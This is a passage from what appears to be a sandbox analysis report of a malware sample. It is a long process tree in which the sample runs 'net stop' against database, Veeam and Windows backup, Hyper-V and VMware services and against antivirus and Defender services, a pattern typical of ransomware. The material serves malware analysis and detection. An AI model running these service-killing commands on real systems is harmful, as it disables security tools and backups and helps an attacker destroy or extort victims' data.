    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        5⤵
        
        PID:3700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
    3⤵
    PID:2036
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY"
      4⤵
      PID:3876
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY"
        5⤵
        
        PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
    3⤵
    PID:3912
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY$ECWDB2"
      4⤵
      PID:3704
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
        5⤵
        
        PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
    3⤵
    PID:3812
  - - C:\Windows\system32\net.exe
      net stop "SQLWriter"
      4⤵
      PID:3916
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLWriter"
        5⤵
        
        PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
    3⤵
    PID:3936
  - - C:\Windows\system32\net.exe
      net stop "SstpSvc"
      4⤵
      PID:3932
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SstpSvc"
        5⤵
        
        PID:2708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
    3⤵
    PID:1288
  - - C:\Windows\system32\net.exe
      net stop "svcGenericHost"
      4⤵
      PID:2124
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "svcGenericHost"
        5⤵
        
        PID:2924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "tmlisten"
    3⤵
    PID:1980
  - - C:\Windows\system32\net.exe
      net stop "tmlisten"
      4⤵
      PID:3132
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "tmlisten"
        5⤵
        
        PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "TrueKey"
    3⤵
    PID:2044
  - - C:\Windows\system32\net.exe
      net stop "TrueKey"
      4⤵
      PID:3356
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "TrueKey"
        5⤵
        
        PID:3360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
    3⤵
    PID:4084
  - - C:\Windows\system32\net.exe
      net stop "UI0Detect"
      4⤵
      PID:884
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "UI0Detect"
        5⤵
        
        PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
    3⤵
    PID:2088
  - - C:\Windows\system32\net.exe
      net stop "VeeamBackupSvc"
      4⤵
      PID:3364
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBackupSvc"
        5⤵
        
        PID:4076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
    3⤵
    PID:1732
  - - C:\Windows\system32\net.exe
      net stop "VeeamBrokerSvc"
      4⤵
      PID:2472
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBrokerSvc"
        5⤵
        
        PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
    3⤵
    PID:232
  - - C:\Windows\system32\net.exe
      net stop "VeeamCatalogSvc"
      4⤵
      PID:2252
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCatalogSvc"
        5⤵
        
        PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
    3⤵
    PID:2952
  - - C:\Windows\system32\net.exe
      net stop "VeeamCloudSvc"
      4⤵
      PID:200
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCloudSvc"
        5⤵
        
        PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
    3⤵
    PID:3016
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploymentService"
      4⤵
      PID:3764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploymentService"
        5⤵
        
        PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
    3⤵
    PID:768
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploySvc"
      4⤵
      PID:1540
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploySvc"
        5⤵
        
        PID:324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
    3⤵
    PID:2032
  - - C:\Windows\system32\net.exe
      net stop "VeeamEnterpriseManagerSvc"
      4⤵
      PID:2764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
        5⤵
        
        PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
    3⤵
    PID:3540
  - - C:\Windows\system32\net.exe
      net stop "VeeamMountSvc"
      4⤵
      PID:3160
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamMountSvc"
        5⤵
        
        PID:5392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
    3⤵
    PID:6080
  - - C:\Windows\system32\net.exe
      net stop "VeeamNFSSvc"
      4⤵
      PID:6084
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamNFSSvc"
        5⤵
        
        PID:6232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
    3⤵
    PID:6116
  - - C:\Windows\system32\net.exe
      net stop "VeeamRESTSvc"
      4⤵
      PID:6124
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamRESTSvc"
        5⤵
        
        PID:6172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
    3⤵
    PID:6208
  - - C:\Windows\system32\net.exe
      net stop "VeeamTransportSvc"
      4⤵
      PID:2876
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamTransportSvc"
        5⤵
        
        PID:4148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "W3Svc"
    3⤵
    PID:3772
  - - C:\Windows\system32\net.exe
      net stop "W3Svc"
      4⤵
      PID:6344
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "W3Svc"
        5⤵
        
        PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:316
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:596
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WRSVC"
    3⤵
    PID:4204
  - - C:\Windows\system32\net.exe
      net stop "WRSVC"
      4⤵
      PID:6228
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WRSVC"
        5⤵
        
        PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:6004
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:5864
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        5⤵
        
        PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:5952
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:5928
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
    3⤵
    PID:5880
  - - C:\Windows\system32\net.exe
      net stop "VeeamHvIntegrationSvc"
      4⤵
      PID:5836
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
        5⤵
        
        PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "swi_update"
    3⤵
    PID:5816
  - - C:\Windows\system32\net.exe
      net stop "swi_update"
      4⤵
      PID:5776
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "swi_update"
        5⤵
        
        PID:5748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
    3⤵
    PID:5656
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CXDB"
      4⤵
      PID:5640
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CXDB"
        5⤵
        
        PID:5624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
    3⤵
    PID:5576
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CITRIX_METAFRAME"
      4⤵
      PID:5572
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
        5⤵
        
        PID:6092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
    3⤵
    PID:5096
  - - C:\Windows\system32\net.exe
      net stop "SQL Backups"
      4⤵
      PID:4144
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQL Backups"
        5⤵
        
        PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
    3⤵
    PID:4824
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PROD"
      4⤵
      PID:4820
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROD"
        5⤵
        
        PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
    3⤵
    PID:4564
  - - C:\Windows\system32\net.exe
      net stop "Zoolz 2 Service"
      4⤵
      PID:4752
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Zoolz 2 Service"
        5⤵
        
        PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
    3⤵
    PID:4656
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper"
      4⤵
      PID:4660
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper"
        5⤵
        
        PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
    3⤵
    PID:4468
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROD"
      4⤵
      PID:4496
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROD"
        5⤵
        
        PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
    3⤵
    PID:4412
  - - C:\Windows\system32\net.exe
      net stop "msftesql$PROD"
      4⤵
      PID:4392
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "msftesql$PROD"
        5⤵
        
        PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
    3⤵
    PID:4324
  - - C:\Windows\system32\net.exe
      net stop "NetMsmqActivator"
      4⤵
      PID:4312
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "NetMsmqActivator"
        5⤵
        
        PID:4388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
    3⤵
    PID:4360
  - - C:\Windows\system32\net.exe
      net stop "EhttpSrv"
      4⤵
      PID:4732
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EhttpSrv"
        5⤵
        
        PID:6324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ekrn"
    3⤵
    PID:6348
  - - C:\Windows\system32\net.exe
      net stop "ekrn"
      4⤵
      PID:4304
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ekrn"
        5⤵
        
        PID:6316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
    3⤵
    PID:6256
  - - C:\Windows\system32\net.exe
      net stop "ESHASRV"
      4⤵
      PID:6248
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ESHASRV"
        5⤵
        
        PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
    3⤵
    PID:5680
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SOPHOS"
      4⤵
      PID:5504
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
        5⤵
        
        PID:5724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
    3⤵
    PID:3272
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SOPHOS"
      4⤵
      PID:1316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
        5⤵
        
        PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AVP"
    3⤵
    PID:4524
  - - C:\Windows\system32\net.exe
      net stop "AVP"
      4⤵
      PID:4500
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AVP"
        5⤵
        
        PID:1640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "klnagent"
    3⤵
    PID:5428
  - - C:\Windows\system32\net.exe
      net stop "klnagent"
      4⤵
      PID:5408
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "klnagent"
        5⤵
        
        PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
    3⤵
    PID:5328
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQLEXPRESS"
      4⤵
      PID:5500
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
        5⤵
        
        PID:3984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
    3⤵
    PID:5216
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQLEXPRESS"
      4⤵
      PID:5256
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
        5⤵
        
        PID:5264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:5936
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:5184
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:5632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "HvHost"
    3⤵
    PID:5108
  - - C:\Windows\system32\net.exe
      net stop "HvHost"
      4⤵
      PID:1528
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "HvHost"
        5⤵
        
        PID:5800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
    3⤵
    PID:3588
  - - C:\Windows\system32\net.exe
      net stop "vmickvpexchange"
      4⤵
      PID:4172
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmickvpexchange"
        5⤵
        
        PID:6148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
    3⤵
    PID:5072
  - - C:\Windows\system32\net.exe
      net stop "vmicguestinterface"
      4⤵
      PID:5780
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicguestinterface"
        5⤵
        
        PID:5840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
    3⤵
    PID:1632
  - - C:\Windows\system32\net.exe
      net stop "vmicshutdown"
      4⤵
      PID:5400
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicshutdown"
        5⤵
        
        PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
    3⤵
    PID:2232
  - - C:\Windows\system32\net.exe
      net stop "vmicheartbeat"
      4⤵
      PID:764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicheartbeat"
        5⤵
        
        PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmcompute"
    3⤵
    PID:2932
  - - C:\Windows\system32\net.exe
      net stop "vmcompute"
      4⤵
      PID:156
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmcompute"
        5⤵
        
        PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
    3⤵
    PID:4756
  - - C:\Windows\system32\net.exe
      net stop "vmicvmsession"
      4⤵
      PID:6924
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicvmsession"
        5⤵
        
        PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
    3⤵
    PID:380
  - - C:\Windows\system32\net.exe
      net stop "vmicrdv"
      4⤵
      PID:5472
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicrdv"
        5⤵
        
        PID:5208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
    3⤵
    - System Time Discovery
    PID:3896
  - - C:\Windows\system32\net.exe
      net stop "vmictimesync"
      4⤵
      System Time Discovery
      PID:3824
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmictimesync"
        5⤵
        System Time Discovery
        
        PID:3808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvss"
    3⤵
    PID:3584
  - - C:\Windows\system32\net.exe
      net stop "vmicvss"
      4⤵
      PID:5564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicvss"
        5⤵
        
        PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
    3⤵
    PID:5012
  - - C:\Windows\system32\net.exe
      net stop "VMAuthdService"
      4⤵
      PID:5736
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMAuthdService"
        5⤵
        
        PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
    3⤵
    PID:4976
  - - C:\Windows\system32\net.exe
      net stop "VMnetDHCP"
      4⤵
      PID:4888
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMnetDHCP"
        5⤵
        
        PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
    3⤵
    PID:4748
  - - C:\Windows\system32\net.exe
      net stop "VMware NAT Service"
      4⤵
      PID:3816
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMware NAT Service"
        5⤵
        
        PID:4492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
    3⤵
    PID:4432
  - - C:\Windows\system32\net.exe
      net stop "VMUSBArbService"
      4⤵
      PID:4244
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMUSBArbService"
        5⤵
        
        PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
    3⤵
    PID:6276
  - - C:\Windows\system32\net.exe
      net stop "VMwareHostd"
      4⤵
      PID:6160
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMwareHostd"
        5⤵
        
        PID:6136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sense"
    3⤵
    PID:4504
  - - C:\Windows\system32\net.exe
      net stop "Sense"
      4⤵
      PID:6408
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sense"
        5⤵
        
        PID:5192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
    3⤵
    PID:6896
  - - C:\Windows\system32\net.exe
      net stop "WdNisSvc"
      4⤵
      PID:6940
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WdNisSvc"
        5⤵
        
        PID:6736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WinDefend"
    3⤵
    PID:6648
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:6640
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:5468

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef61f9758,0x7fef61f9768,0x7fef61f9778
  2⤵
  PID:3880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1080 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:2
  2⤵
  PID:3984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1452 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:8
  2⤵
  PID:3692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:8
  2⤵
  PID:5732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2188 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:1
  2⤵
  PID:4248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1448 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:1
  2⤵
  PID:5280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2492 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:2
  2⤵
  PID:5208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1348 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:2
  2⤵
  PID:5720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3500 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:1
  2⤵
  PID:6052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3796 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:8
  2⤵
  PID:4720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3824 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:8
  2⤵
  PID:1704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3896 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:1
  2⤵
  PID:4004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1384 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:1
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3812 --field-trial-handle=1204,i,2513381949371077295,2910563967125260680,131072 /prefetch:1
  2⤵
  PID:6976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4008
- C:\Program Files\Google\Chrome\Application\chrome.exe
